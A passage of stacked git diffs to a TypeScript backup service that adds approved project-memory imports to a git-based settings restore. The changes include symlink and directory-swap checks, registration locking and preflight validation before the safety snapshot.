+      { projectImports: [{ token: "candidate-token", targetPath: target }] }
+    );
+
+    expect(result.success).toBe(true);
+    // Neither registered nor written into: it is not the directory the user approved.
+    expect(registrations).toBe(0);
+    expect(importedTo).toEqual([]);
+    if (result.success) {
+      expect(result.data.projectImportResults[0]).toMatchObject({
+        status: "failed",
+        message: expect.stringContaining("replaced") as string,
+      });
+    }
+  });
+
   test("refuses an import into a project that a matched entry restores in the same run", async () => {
     const target = path.join(tempDir, "target");
     await fs.mkdir(target);

--- a/src/node/services/backup/backupService.ts
+++ b/src/node/services/backup/backupService.ts
@@ -169,6 +169,8 @@ export interface BackupProjectRegistrar {
         projectPath: string,
         options?: { displayName?: string }
       ): Promise<Result<{ normalizedPath: string }, string>>;
+      /** Throws once this process no longer holds the lock; called before each commit. */
+      assertStillOwned(): Promise<void>;
     }) => Promise<T>
   ): Promise<T>;
 }
@@ -990,6 +992,9 @@ export class BackupService {
             results.push(unchecked(registeredIdentity ?? targetPath));
             continue;
           }
+          // Before each irreversible step: this process must still hold the registration
+          // lock, or another process has judged it stale and may be registering meanwhile.
+          await locked.assertStillOwned();
           // The backed-up name travels with a newly registered project (in the same config
           // write as the registration); an already registered target keeps its local name.
           const created =
@@ -1037,6 +1042,7 @@ export class BackupService {
             );
             continue;
           }
+          await locked.assertStillOwned();
           const written = await importer.importProjectMemory({
             token: candidate.token,
             targetPath: registeredPath,

--- a/src/node/services/backup/backupService.ts
+++ b/src/node/services/backup/backupService.ts
@@ -190,8 +190,14 @@ interface RegisteredProjectLookup {
   byCanonical: ReadonlyMap<string, string>;
 }
 
-/** Bounds on resolving registered projects' real paths; see registeredProjectLookup. */
-const REGISTRY_CANONICALIZE_CONCURRENCY = 8;
+/**
+ * Bounds on resolving registered projects' real paths; see registeredProjectLookup. One probe
+ * in flight, deliberately: Node's fs has no cancellation, so a `realpath` that a timed-out
+ * race stopped waiting for keeps its libuv threadpool worker until the mount answers. With
+ * one at a time, an unavailable mount can hold at most one of the pool's threads, not the
+ * whole pool; the deadline bounds how long the restore itself waits.
+ */
+const REGISTRY_CANONICALIZE_CONCURRENCY = 1;
 const REGISTRY_CANONICALIZE_DEADLINE_MS = 5_000;
 
 /**
@@ -340,8 +346,8 @@ async function realpathOrNull(target: string): Promise<string | null> {
 
 /**
  * `realpathOrNull` bounded by `timeoutMs`: null once the time is up. A resolution still
- * blocked on an unavailable mount then finishes on its own in the threadpool; nothing
- * waits for it.
+ * blocked on an unavailable mount then finishes on its own in the threadpool; nothing waits
+ * for it, and REGISTRY_CANONICALIZE_CONCURRENCY keeps such leftovers to one at a time.
  */
 async function realpathWithin(target: string, timeoutMs: number): Promise<string | null> {
   if (timeoutMs <= 0) return null;
@@ -929,9 +935,13 @@ export class BackupService {
           }
           // The same directory the user approved, not merely one at the same path: a checkout
           // moved away and another created here since would otherwise be registered and
-          // receive the approved source's memory. create() re-resolves the path itself, so
-          // a swap after this check remains a race this pinning narrows rather than closes.
-          if (stat.dev !== targetIdentity.dev || stat.ino !== targetIdentity.ino) {
+          // receive the approved source's memory. Checked again after create() below, which
+          // re-resolves the path itself during its own asynchronous validation.
+          const replaced = (current: { dev: number; ino: number } | null): boolean =>
+            current === null ||
+            current.dev !== targetIdentity.dev ||
+            current.ino !== targetIdentity.ino;
+          if (replaced(stat)) {
             results.push(
               failed(`'${targetPath}' was replaced by a different directory since it was approved`)
             );
@@ -983,6 +993,18 @@ export class BackupService {
             }
           } else {
             results.push(failed(created.error));
+            continue;
+          }
+          // Re-pinned after registration, immediately before the write: a directory swapped
+          // in while create() ran was registered by path, and the approved source's memory
+          // must not follow it into that other checkout. The registration stays (the safety
+          // snapshot cannot revert it) and is reported as this candidate's failure.
+          if (replaced(await fs.lstat(targetPath).catch(() => null))) {
+            results.push(
+              failed(
+                `'${targetPath}' was replaced by a different directory while it was being registered; the registration was kept, nothing was imported`
+              )
+            );
             continue;
           }
           const written = await importer.importProjectMemory({

--- a/src/node/services/backup/backupService.ts
+++ b/src/node/services/backup/backupService.ts
@@ -111,13 +111,23 @@ export interface BackupPayloadStore {
     restoredProjectMemory: Array<{ projectPath: string; files: string[] }>;
   }>;
   /**
+   * Reads and validates the checked-out bundle once for a whole restore's approved
+   * imports; the returned importer then writes each one from that parsed copy. Per-import
+   * rereads would hash the entire bundle once per candidate.
+   */
+  prepareProjectImports(options: {
+    repositoryRoot: string;
+    managedPath: string;
+  }): Promise<BackupProjectImporter>;
+}
+
+export interface BackupProjectImporter {
+  /**
    * Writes one approved import's memory files, re-keyed to the target path's locally
    * computed directory, add-only. Runs after the project was registered so no path ever
    * holds the memory mutation lock while entering config edits.
    */
   importProjectMemory(options: {
-    repositoryRoot: string;
-    managedPath: string;
     token: string;
     targetPath: string;
   }): Promise<{ writtenFiles: string[]; skippedFiles: string[] }>;
@@ -388,6 +398,7 @@ export class BackupService {
         commandApprovals: BackupCommandApproval[];
         projectImports: BackupProjectImport[];
         projectBundleSkipped: boolean;
+        pushError: string | null;
       },
       BackupOperationError
     >
@@ -397,27 +408,38 @@ export class BackupService {
       const repository = await this.prepareRepository(normalized);
       // One critical section: the reported restore plan and the exported payload must describe
       // the same local state, or the two halves of the preview disagree.
-      const { restorePreview, exported } = await this.withLocalPayload(async () => ({
-        restorePreview: await this.dependencies.payload.previewRestore({
+      const { restorePreview, exported } = await this.withLocalPayload(async () => {
+        const restorePreview = await this.dependencies.payload.previewRestore({
           repositoryRoot: repository.rootDir,
           managedPath: repository.managedPath,
           includeProjects,
-        }),
-        exported: await this.dependencies.payload.exportTo({
-          repositoryRoot: repository.rootDir,
-          managedPath: repository.managedPath,
-          includeProjects,
-        }),
-      }));
-      const pushChanges = await this.dependencies.gitRepo.getPushChanges(repository);
+        });
+        // The push half fails on local state alone (an over-limit project list, an
+        // unexportable path); that must not hide the restore half, which is the only
+        // way to obtain the import approvals a cross-machine restore needs.
+        let exported: { redactions: string[] } | { pushError: string };
+        try {
+          exported = await this.dependencies.payload.exportTo({
+            repositoryRoot: repository.rootDir,
+            managedPath: repository.managedPath,
+            includeProjects,
+          });
+        } catch (error) {
+          exported = { pushError: toOperationError(error).message };
+        }
+        return { restorePreview, exported };
+      });
+      const pushChanges =
+        "pushError" in exported ? [] : await this.dependencies.gitRepo.getPushChanges(repository);
       return Ok({
         pushChanges,
         restoreChanges: restorePreview.changes,
         localOnlyFiles: restorePreview.localOnlyFiles,
-        redactions: exported.redactions,
+        redactions: "pushError" in exported ? [] : exported.redactions,
         commandApprovals: restorePreview.commandApprovals,
         projectImports: restorePreview.projectImports,
         projectBundleSkipped: restorePreview.projectBundleSkipped,
+        pushError: "pushError" in exported ? exported.pushError : null,
       });
     });
   }
@@ -625,13 +647,6 @@ export class BackupService {
         );
       }
       const resolved = path.resolve(targetPath);
-      if (claimedTargets.has(resolved)) {
-        throw new BackupServiceError(
-          "IO_ERROR",
-          `Cannot import '${candidate.name}': another import already targets '${resolved}'`
-        );
-      }
-      claimedTargets.add(resolved);
       const stat = await fs.lstat(resolved).catch(() => null);
       // A symlinked target would register the link's path while memory lands under a dir
       // name derived from it; require the plain directory itself.
@@ -641,6 +656,17 @@ export class BackupService {
           `Cannot import '${candidate.name}': '${resolved}' is not an existing directory`
         );
       }
+      // Claimed by real path: two lexically different targets that reach one directory
+      // through a symlinked parent would otherwise both register/resolve to the same
+      // project and merge two backed-up projects' memories into it.
+      const canonical = (await realpathOrNull(resolved)) ?? resolved;
+      if (claimedTargets.has(canonical)) {
+        throw new BackupServiceError(
+          "IO_ERROR",
+          `Cannot import '${candidate.name}': another import already targets '${resolved}'`
+        );
+      }
+      claimedTargets.add(canonical);
       planned.push({ candidate, targetPath: resolved });
     }
     return planned;
@@ -658,6 +684,11 @@ export class BackupService {
     planned: ReadonlyArray<{ candidate: BackupProjectImport; targetPath: string }>
   ): Promise<BackupProjectImportResult[]> {
     const results: BackupProjectImportResult[] = [];
+    if (planned.length === 0) return results;
+    const importer = await this.dependencies.payload.prepareProjectImports({
+      repositoryRoot: repository.rootDir,
+      managedPath: repository.managedPath,
+    });
     for (const { candidate, targetPath } of planned) {
       // Once registration resolves the project identity, failures report that path: it is
       // where any partially written memory actually lives.
@@ -702,9 +733,7 @@ export class BackupService {
           results.push(failed(created.error));
           continue;
         }
-        const written = await this.dependencies.payload.importProjectMemory({
-          repositoryRoot: repository.rootDir,
-          managedPath: repository.managedPath,
+        const written = await importer.importProjectMemory({
           token: candidate.token,
           targetPath: registeredPath,
         });

--- a/src/node/services/backup/backupService.ts
+++ b/src/node/services/backup/backupService.ts
@@ -122,6 +122,12 @@ export interface BackupPayloadStore {
 
 export interface BackupProjectImporter {
   /**
+   * The write-side refusals for one approved import against its target — memory size and
+   * count limits, non-file destinations — without writing. Run before the snapshot so a
+   * predictably impossible import never leaves a registered project behind.
+   */
+  assertProjectMemoryAllowed(options: { token: string; targetPath: string }): Promise<void>;
+  /**
    * Writes one approved import's memory files, re-keyed to the target path's locally
    * computed directory, add-only. Runs after the project was registered so no path ever
    * holds the memory mutation lock while entering config edits.
@@ -540,6 +546,12 @@ export class BackupService {
         localOnlyFiles: string[];
         projectImportResults: BackupProjectImportResult[];
         projectBundleSkipped: boolean;
+        /**
+         * Candidates the restore did not import because no approval was given — a restore
+         * run without a preview, or with candidates left unchecked. Reported so a
+         * "completed" restore never silently omits backed-up projects.
+         */
+        unapprovedProjectImports: BackupProjectImport[];
       },
       BackupOperationError
     >
@@ -575,6 +587,26 @@ export class BackupService {
           validated.projectImports,
           includeProjects
         );
+        // The bundle is read once for every approved import, and each import's write-side
+        // refusals run now: an import that cannot land must fail while nothing has changed
+        // yet, not after the core restore and its project registration.
+        const importer =
+          plannedImports.length === 0
+            ? null
+            : await this.dependencies.payload.prepareProjectImports({
+                repositoryRoot: repository.rootDir,
+                managedPath: repository.managedPath,
+              });
+        for (const planned of plannedImports) {
+          await importer?.assertProjectMemoryAllowed({
+            token: planned.candidate.token,
+            targetPath: planned.targetPath,
+          });
+        }
+        const plannedTokens = new Set(plannedImports.map((planned) => planned.candidate.token));
+        const unapprovedProjectImports = validated.projectImports.filter(
+          (candidate) => !plannedTokens.has(candidate.token)
+        );
         const snapshotPath = await this.createSnapshotPath();
         try {
           await this.dependencies.payload.writeSafetySnapshot(snapshotPath);
@@ -600,7 +632,8 @@ export class BackupService {
           // does not cover, and their per-candidate results are the user's only undo list, so
           // nothing that can fail may run after them and discard those results.
           await this.persistSettings(normalized, { lastRestoredCommit: remoteCommit });
-          const projectImportResults = await this.executeProjectImports(repository, plannedImports);
+          const projectImportResults =
+            importer === null ? [] : await this.executeProjectImports(importer, plannedImports);
           this.notifyProjectMemoryChanges([], projectImportResults);
           return Ok({
             commit: remoteCommit,
@@ -609,6 +642,7 @@ export class BackupService {
             localOnlyFiles: restored.localOnlyFiles,
             projectImportResults,
             projectBundleSkipped: restored.projectBundleSkipped,
+            unapprovedProjectImports,
           });
         } catch (error) {
           // Memory the failed restore already overwrote is on disk; subscribers must
@@ -700,15 +734,10 @@ export class BackupService {
    * roll anything back anyway; the result is the user's undo list.
    */
   private async executeProjectImports(
-    repository: PreparedBackupRepository,
+    importer: BackupProjectImporter,
     planned: ReadonlyArray<{ candidate: BackupProjectImport; targetPath: string }>
   ): Promise<BackupProjectImportResult[]> {
     const results: BackupProjectImportResult[] = [];
-    if (planned.length === 0) return results;
-    const importer = await this.dependencies.payload.prepareProjectImports({
-      repositoryRoot: repository.rootDir,
-      managedPath: repository.managedPath,
-    });
     for (const { candidate, targetPath } of planned) {
       // Once registration resolves the project identity, failures report that path: it is
       // where any partially written memory actually lives.

--- a/src/node/services/backup/backupService.ts
+++ b/src/node/services/backup/backupService.ts
@@ -593,12 +593,15 @@ export class BackupService {
             snapshotPath,
             matchedProjectPaths: validated.matchedProjectPaths,
           });
+          // Announced as soon as the memory is on disk: a failure recording the commit below
+          // must not leave subscribers showing pre-restore contents.
+          this.notifyProjectMemoryChanges(restored.restoredProjectMemory, []);
           // Recorded before the imports: they register projects and create files the snapshot
           // does not cover, and their per-candidate results are the user's only undo list, so
           // nothing that can fail may run after them and discard those results.
           await this.persistSettings(normalized, { lastRestoredCommit: remoteCommit });
           const projectImportResults = await this.executeProjectImports(repository, plannedImports);
-          this.notifyProjectMemoryChanges(restored.restoredProjectMemory, projectImportResults);
+          this.notifyProjectMemoryChanges([], projectImportResults);
           return Ok({
             commit: remoteCommit,
             snapshotPath,

--- a/src/node/services/backup/backupService.ts
+++ b/src/node/services/backup/backupService.ts
@@ -10,6 +10,8 @@ import {
   type BackupCredentialKind,
   type BackupFileChange,
   type BackupOperationError,
+  type BackupProjectImport,
+  type BackupProjectImportResult,
 } from "@/common/orpc/schemas/backup";
 import {
   SettingsBackupInputSchema,
@@ -23,7 +25,10 @@ import {
   isBackupCacheName,
   reapDiscardedBackupCaches,
 } from "./gitRepo";
-import { BackupCommandApprovalRequiredError } from "./payload";
+import {
+  BackupCommandApprovalRequiredError,
+  BackupProjectImportApprovalRequiredError,
+} from "./payload";
 
 export interface PreparedBackupRepository {
   rootDir: string;
@@ -61,23 +66,54 @@ export interface BackupPayloadStore {
   exportTo(options: {
     repositoryRoot: string;
     managedPath: string;
+    includeProjects: boolean;
   }): Promise<{ redactions: string[]; secretFiles: string[]; secretApproval: string }>;
-  previewRestore(options: { repositoryRoot: string; managedPath: string }): Promise<{
+  previewRestore(options: {
+    repositoryRoot: string;
+    managedPath: string;
+    includeProjects: boolean;
+  }): Promise<{
     changes: BackupFileChange[];
     localOnlyFiles: string[];
     commandApprovals: BackupCommandApproval[];
+    projectImports: BackupProjectImport[];
+    projectBundleSkipped: boolean;
   }>;
   validateRestore(options: {
     repositoryRoot: string;
     managedPath: string;
     approvedCommandTokens?: readonly string[];
-  }): Promise<void>;
-  writeSafetySnapshot(snapshotRoot: string): Promise<void>;
+    includeProjects: boolean;
+  }): Promise<{ hasProjectBundle: boolean; projectImports: BackupProjectImport[] }>;
+  writeSafetySnapshot(
+    snapshotRoot: string,
+    options: { includeProjectMemory: boolean }
+  ): Promise<void>;
   restore(options: {
     repositoryRoot: string;
     managedPath: string;
     approvedCommandTokens?: readonly string[];
-  }): Promise<{ changedFiles: string[]; localOnlyFiles: string[] }>;
+    includeProjects: boolean;
+  }): Promise<{ changedFiles: string[]; localOnlyFiles: string[]; projectBundleSkipped: boolean }>;
+  /**
+   * Writes one approved import's memory files, re-keyed to the target path's locally
+   * computed directory, add-only. Runs after the project was registered so no path ever
+   * holds the memory mutation lock while entering config edits.
+   */
+  importProjectMemory(options: {
+    repositoryRoot: string;
+    managedPath: string;
+    token: string;
+    targetPath: string;
+  }): Promise<{ writtenFiles: string[]; skippedFiles: string[] }>;
+}
+
+/**
+ * The slice of ProjectService a restore needs to register an approved import. Injected via
+ * setter because the container constructs BackupService before ProjectService.
+ */
+export interface BackupProjectRegistrar {
+  create(projectPath: string): Promise<Result<{ normalizedPath: string }, string>>;
 }
 
 export interface BackupServiceDependencies {
@@ -152,6 +188,16 @@ function toOperationError(error: unknown): BackupOperationError {
       code: error.code,
       message: error.message,
       commandApprovals: [...error.approvals],
+    };
+  }
+
+  // Same round trip for project imports: the error carries the candidates recomputed from
+  // the currently checked-out payload, so a stale approval can be re-made from fresh data.
+  if (error instanceof BackupProjectImportApprovalRequiredError) {
+    return {
+      code: error.code,
+      message: error.message,
+      projectImports: [...error.projectImports],
     };
   }
 
@@ -254,10 +300,17 @@ export class BackupService {
    */
   private snapshotSequence = 0;
 
+  /** Absent until the container wires ProjectService; imports fail per candidate without it. */
+  private projectRegistrar: BackupProjectRegistrar | null = null;
+
   constructor(
     private readonly config: Config,
     private readonly dependencies: BackupServiceDependencies
   ) {}
+
+  setProjectService(projectRegistrar: BackupProjectRegistrar): void {
+    this.projectRegistrar = projectRegistrar;
+  }
 
   getSettings(): SettingsBackup | null {
     return this.config.loadConfigOrDefault().settingsBackup ?? null;
@@ -300,11 +353,14 @@ export class BackupService {
         localOnlyFiles: string[];
         redactions: string[];
         commandApprovals: BackupCommandApproval[];
+        projectImports: BackupProjectImport[];
+        projectBundleSkipped: boolean;
       },
       BackupOperationError
     >
   > {
     return this.withRepoLock(settings, async (normalized) => {
+      const includeProjects = normalized.includeProjects === true;
       const repository = await this.prepareRepository(normalized);
       // One critical section: the reported restore plan and the exported payload must describe
       // the same local state, or the two halves of the preview disagree.
@@ -312,10 +368,12 @@ export class BackupService {
         restorePreview: await this.dependencies.payload.previewRestore({
           repositoryRoot: repository.rootDir,
           managedPath: repository.managedPath,
+          includeProjects,
         }),
         exported: await this.dependencies.payload.exportTo({
           repositoryRoot: repository.rootDir,
           managedPath: repository.managedPath,
+          includeProjects,
         }),
       }));
       const pushChanges = await this.dependencies.gitRepo.getPushChanges(repository);
@@ -325,6 +383,8 @@ export class BackupService {
         localOnlyFiles: restorePreview.localOnlyFiles,
         redactions: exported.redactions,
         commandApprovals: restorePreview.commandApprovals,
+        projectImports: restorePreview.projectImports,
+        projectBundleSkipped: restorePreview.projectBundleSkipped,
       });
     });
   }
@@ -335,10 +395,16 @@ export class BackupService {
   }
 
   restoreWithApproval(
-    input: SettingsBackupInput & { approvedCommandTokens?: readonly string[] | null }
+    input: SettingsBackupInput & {
+      approvedCommandTokens?: readonly string[] | null;
+      projectImports?: ReadonlyArray<{ token: string; targetPath: string }> | null;
+    }
   ) {
-    const { approvedCommandTokens, ...settings } = input;
-    return this.restore(settings, { approvedCommandTokens: approvedCommandTokens ?? undefined });
+    const { approvedCommandTokens, projectImports, ...settings } = input;
+    return this.restore(settings, {
+      approvedCommandTokens: approvedCommandTokens ?? undefined,
+      projectImports: projectImports ?? undefined,
+    });
   }
 
   async push(
@@ -362,6 +428,7 @@ export class BackupService {
         this.dependencies.payload.exportTo({
           repositoryRoot: repository.rootDir,
           managedPath: repository.managedPath,
+          includeProjects: normalized.includeProjects === true,
         })
       );
       // Approval is bound to the exact flagged bytes, so an override the user granted for
@@ -391,16 +458,28 @@ export class BackupService {
 
   async restore(
     settings: SettingsBackupInput,
-    options: { approvedCommandTokens?: readonly string[] } = {}
+    options: {
+      approvedCommandTokens?: readonly string[];
+      projectImports?: ReadonlyArray<{ token: string; targetPath: string }>;
+    } = {}
   ): Promise<
     Result<
-      { commit: string; snapshotPath: string; changedFiles: string[]; localOnlyFiles: string[] },
+      {
+        commit: string;
+        snapshotPath: string;
+        changedFiles: string[];
+        localOnlyFiles: string[];
+        projectImportResults: BackupProjectImportResult[];
+        projectBundleSkipped: boolean;
+      },
       BackupOperationError
     >
   > {
     const approvedCommandTokens =
       options.approvedCommandTokens == null ? undefined : [...options.approvedCommandTokens];
+    const requestedImports = options.projectImports == null ? [] : [...options.projectImports];
     return this.withRepoLock(settings, async (normalized) => {
+      const includeProjects = normalized.includeProjects === true;
       const repository = await this.prepareRepository(normalized);
       const remoteCommit = repository.remoteCommit;
       if (remoteCommit == null) {
@@ -413,14 +492,25 @@ export class BackupService {
       return await this.withLocalPayload(async () => {
         // Before the snapshot, so a restore blocked on command approval does not leave an
         // unredacted copy of the local settings on disk.
-        await this.dependencies.payload.validateRestore({
+        const validated = await this.dependencies.payload.validateRestore({
           repositoryRoot: repository.rootDir,
           managedPath: repository.managedPath,
           approvedCommandTokens,
+          includeProjects,
         });
+        // Import approvals are also checked before the snapshot and before any mutation: a
+        // stale token or an unusable target directory refuses the whole restore while
+        // nothing has changed yet. Runtime failures after this point are per-candidate.
+        const plannedImports = await this.planProjectImports(
+          requestedImports,
+          validated.projectImports,
+          includeProjects
+        );
         const snapshotPath = await this.createSnapshotPath();
         try {
-          await this.dependencies.payload.writeSafetySnapshot(snapshotPath);
+          await this.dependencies.payload.writeSafetySnapshot(snapshotPath, {
+            includeProjectMemory: includeProjects && validated.hasProjectBundle,
+          });
         } catch (error) {
           // Nothing has been restored yet, so a snapshot that did not finish is an empty or
           // partial unredacted copy that no recovery can use, and every retry would add one.
@@ -432,13 +522,17 @@ export class BackupService {
             repositoryRoot: repository.rootDir,
             managedPath: repository.managedPath,
             approvedCommandTokens,
+            includeProjects,
           });
+          const projectImportResults = await this.executeProjectImports(repository, plannedImports);
           await this.persistSettings(normalized, { lastRestoredCommit: remoteCommit });
           return Ok({
             commit: remoteCommit,
             snapshotPath,
             changedFiles: restored.changedFiles,
             localOnlyFiles: restored.localOnlyFiles,
+            projectImportResults,
+            projectBundleSkipped: restored.projectBundleSkipped,
           });
         } catch (error) {
           // Past the snapshot, the restore may have overwritten files before failing, and
@@ -453,6 +547,131 @@ export class BackupService {
         }
       });
     });
+  }
+
+  /**
+   * Everything about an import request that can be refused while the restore has changed
+   * nothing yet: tokens must match the candidates recomputed from the currently checked-out
+   * payload, and each target must already be a real local directory — `ProjectService.create`
+   * would otherwise mkdir a typo into existence.
+   */
+  private async planProjectImports(
+    requested: ReadonlyArray<{ token: string; targetPath: string }>,
+    candidates: readonly BackupProjectImport[],
+    includeProjects: boolean
+  ): Promise<Array<{ candidate: BackupProjectImport; targetPath: string }>> {
+    if (requested.length === 0) return [];
+    if (!includeProjects) {
+      throw new BackupServiceError(
+        "IO_ERROR",
+        "Project imports require the project backup setting to be enabled"
+      );
+    }
+    const byToken = new Map(candidates.map((candidate) => [candidate.token, candidate]));
+    const planned: Array<{ candidate: BackupProjectImport; targetPath: string }> = [];
+    const claimedTargets = new Set<string>();
+    for (const request of requested) {
+      const candidate = byToken.get(request.token);
+      // Unknown and stale tokens are indistinguishable here; both mean the user approved
+      // something other than what the repository currently holds.
+      if (candidate === undefined) {
+        throw new BackupProjectImportApprovalRequiredError(candidates);
+      }
+      byToken.delete(request.token);
+      const targetPath = request.targetPath.trim();
+      if (!path.isAbsolute(targetPath)) {
+        throw new BackupServiceError(
+          "IO_ERROR",
+          `Cannot import '${candidate.name}': the target path must be absolute`
+        );
+      }
+      const resolved = path.resolve(targetPath);
+      if (claimedTargets.has(resolved)) {
+        throw new BackupServiceError(
+          "IO_ERROR",
+          `Cannot import '${candidate.name}': another import already targets '${resolved}'`
+        );
+      }
+      claimedTargets.add(resolved);
+      const stat = await fs.lstat(resolved).catch(() => null);
+      // A symlinked target would register the link's path while memory lands under a dir
+      // name derived from it; require the plain directory itself.
+      if (stat === null || !stat.isDirectory() || stat.isSymbolicLink()) {
+        throw new BackupServiceError(
+          "IO_ERROR",
+          `Cannot import '${candidate.name}': '${resolved}' is not an existing directory`
+        );
+      }
+      planned.push({ candidate, targetPath: resolved });
+    }
+    return planned;
+  }
+
+  /**
+   * Registration before the memory write, per candidate: a crash between the two leaves a
+   * registered project without memory, which is benign, rather than orphaned live memory.
+   * Failures land in the result instead of aborting the restore or the other candidates —
+   * the safety snapshot cannot revert a project registration, so an abort here would not
+   * roll anything back anyway; the result is the user's undo list.
+   */
+  private async executeProjectImports(
+    repository: PreparedBackupRepository,
+    planned: ReadonlyArray<{ candidate: BackupProjectImport; targetPath: string }>
+  ): Promise<BackupProjectImportResult[]> {
+    const results: BackupProjectImportResult[] = [];
+    for (const { candidate, targetPath } of planned) {
+      const failed = (message: string): BackupProjectImportResult => ({
+        sourcePath: candidate.sourcePath,
+        targetPath,
+        name: candidate.name,
+        status: "failed",
+        message,
+        writtenFiles: [],
+        skippedFiles: [],
+      });
+      try {
+        if (this.projectRegistrar === null) {
+          results.push(failed("Project registration is unavailable"));
+          continue;
+        }
+        // Re-verify under the local payload lock: the preflight ran before the snapshot and
+        // the directory may have vanished since.
+        const stat = await fs.lstat(targetPath).catch(() => null);
+        if (stat === null || !stat.isDirectory()) {
+          results.push(failed(`'${targetPath}' is not an existing directory`));
+          continue;
+        }
+        const created = await this.projectRegistrar.create(targetPath);
+        let registeredPath: string;
+        if (created.success) {
+          registeredPath = created.data.normalizedPath;
+        } else if (created.error === "Project already exists") {
+          // Already registered at exactly this path is the idempotent case: the import
+          // then only adds the memory files.
+          registeredPath = path.resolve(targetPath);
+        } else {
+          results.push(failed(created.error));
+          continue;
+        }
+        const written = await this.dependencies.payload.importProjectMemory({
+          repositoryRoot: repository.rootDir,
+          managedPath: repository.managedPath,
+          token: candidate.token,
+          targetPath: registeredPath,
+        });
+        results.push({
+          sourcePath: candidate.sourcePath,
+          targetPath: registeredPath,
+          name: candidate.name,
+          status: "imported",
+          writtenFiles: written.writtenFiles,
+          skippedFiles: written.skippedFiles,
+        });
+      } catch (error) {
+        results.push(failed(error instanceof Error ? error.message : String(error)));
+      }
+    }
+    return results;
   }
 
   private async prepareRepository(
@@ -537,6 +756,7 @@ export class BackupService {
       stored?.repoUrl !== saved.repoUrl ||
       stored.branch !== saved.branch ||
       stored.path !== saved.path ||
+      stored.includeProjects !== saved.includeProjects ||
       stored.lastPushedCommit !== saved.lastPushedCommit ||
       stored.lastRestoredCommit !== saved.lastRestoredCommit
     ) {

--- a/src/node/services/backup/backupService.ts
+++ b/src/node/services/backup/backupService.ts
@@ -157,6 +157,12 @@ export interface BackupMemoryNotifier {
   notifyExternalProjectChange(projectPath: string): void;
 }
 
+/** Registered project keys plus a real-path → key index, built once per restore. */
+interface RegisteredProjectLookup {
+  keys: ReadonlySet<string>;
+  byCanonical: ReadonlyMap<string, string>;
+}
+
 /** One approved import after planning: its resolved target and, if already registered, its identity. */
 interface PlannedProjectImport {
   candidate: BackupProjectImport;
@@ -706,6 +712,7 @@ export class BackupService {
     const byToken = new Map(candidates.map((candidate) => [candidate.token, candidate]));
     const planned: PlannedProjectImport[] = [];
     const claimedTargets = new Set<string>();
+    const registry = await this.registeredProjectLookup();
     for (const request of requested) {
       const candidate = byToken.get(request.token);
       // Unknown and stale tokens are indistinguishable here; both mean the user approved
@@ -747,7 +754,7 @@ export class BackupService {
         targetPath: resolved,
         // Known up front when the target is already registered (directly or as an alias),
         // so the preflight checks the memory scope the import will really write to.
-        registeredPath: await this.resolveRegisteredProjectPath(resolved, canonical),
+        registeredPath: this.resolveRegisteredProjectPath(resolved, canonical, registry),
       });
     }
     return planned;
@@ -808,9 +815,15 @@ export class BackupService {
             await this.projectRegistrar.setDisplayName(registeredPath, candidate.name);
           }
         } else if (created.error === "Project already exists") {
+          // Registered since planning (a concurrent registration): resolve against a fresh
+          // lookup, since the planning-time one predates it.
           registeredPath =
             plannedRegisteredPath ??
-            (await this.resolveRegisteredProjectPath(targetPath, await realpathOrNull(targetPath)));
+            this.resolveRegisteredProjectPath(
+              targetPath,
+              await realpathOrNull(targetPath),
+              await this.registeredProjectLookup()
+            );
           if (registeredPath === null) {
             results.push(failed(`'${targetPath}' is already registered under a different path`));
             continue;
@@ -851,22 +864,34 @@ export class BackupService {
    * registered identity — writing under the alias would land files the project never
    * reads while reporting them as imported. Null when neither spelling is registered.
    */
-  private async resolveRegisteredProjectPath(
+  private resolveRegisteredProjectPath(
     targetPath: string,
-    canonicalPath: string | null
-  ): Promise<string | null> {
-    const projects = this.config.loadConfigOrDefault().projects;
+    canonicalPath: string | null,
+    registry: RegisteredProjectLookup
+  ): string | null {
     const resolved = path.resolve(targetPath);
-    if (projects.has(resolved)) return resolved;
+    if (registry.keys.has(resolved)) return resolved;
     if (canonicalPath === null) return null;
-    if (projects.has(canonicalPath)) return canonicalPath;
+    if (registry.keys.has(canonicalPath)) return canonicalPath;
     // Registered keys may themselves be aliases (a project added through a symlinked
     // parent), so the target's real path is compared with each registered project's real
     // path rather than only looked up literally.
-    for (const registered of projects.keys()) {
-      if ((await realpathOrNull(registered)) === canonicalPath) return registered;
+    return registry.byCanonical.get(canonicalPath) ?? null;
+  }
+
+  /**
+   * Registered project keys and their real paths, resolved once per restore: resolving
+   * them per candidate would cost registered × approved filesystem calls, and registered
+   * paths on slow mounts would make the restore look hung.
+   */
+  private async registeredProjectLookup(): Promise<RegisteredProjectLookup> {
+    const keys = new Set(this.config.loadConfigOrDefault().projects.keys());
+    const byCanonical = new Map<string, string>();
+    for (const registered of keys) {
+      const canonical = await realpathOrNull(registered);
+      if (canonical !== null && !byCanonical.has(canonical)) byCanonical.set(canonical, registered);
     }
-    return null;
+    return { keys, byCanonical };
   }
 
   /** One notification per project whose memory changed; failed imports' partial writes count too. */

--- a/src/node/services/backup/backupService.ts
+++ b/src/node/services/backup/backupService.ts
@@ -154,10 +154,20 @@ export interface BackupProjectImporter {
  * setter because the container constructs BackupService before ProjectService.
  */
 export interface BackupProjectRegistrar {
-  create(
-    projectPath: string,
-    options?: { displayName?: string }
-  ): Promise<Result<{ normalizedPath: string }, string>>;
+  /**
+   * Runs `fn` with project registration held stable — nothing is registered or removed
+   * underneath it — and a `create` that registers inside that window. An import resolves its
+   * target's identity, registers it when needed, and writes its memory within one window, so
+   * a removal cannot land between the registration it checked and the memory it wrote.
+   */
+  withRegistrationLock<T>(
+    fn: (registrar: {
+      create(
+        projectPath: string,
+        options?: { displayName?: string }
+      ): Promise<Result<{ normalizedPath: string }, string>>;
+    }) => Promise<T>
+  ): Promise<T>;
 }
 
 /**
@@ -809,122 +819,132 @@ export class BackupService {
   ): Promise<BackupProjectImportResult[]> {
     const results: BackupProjectImportResult[] = [];
     if (planned.length === 0) return results;
-    // Rebuilt now rather than reused from planning: project registration is not serialized
-    // with this restore, so the registry may have changed in between. A target unregistered
-    // since must be registered again, not written into on its stale identity; one registered
-    // meanwhile — possibly through a different symlinked spelling of the same directory,
-    // which create()'s own duplicate check does not resolve — must not be registered a
-    // second time, which would split the project identity.
-    const registry = await this.registeredProjectLookup();
-    for (const { candidate, targetPath, registeredPath: plannedRegisteredPath } of planned) {
-      // The identity the preflight checked (memory limits, non-file destinations,
-      // permissions) is the only one this import may write to. A different identity now —
-      // the checkout registered under another alias since planning — names a memory scope
-      // nothing has checked, so the candidate fails without a write and stays on offer;
-      // the next preview resolves the new registration and preflights it.
-      const preflightedPath = plannedRegisteredPath ?? targetPath;
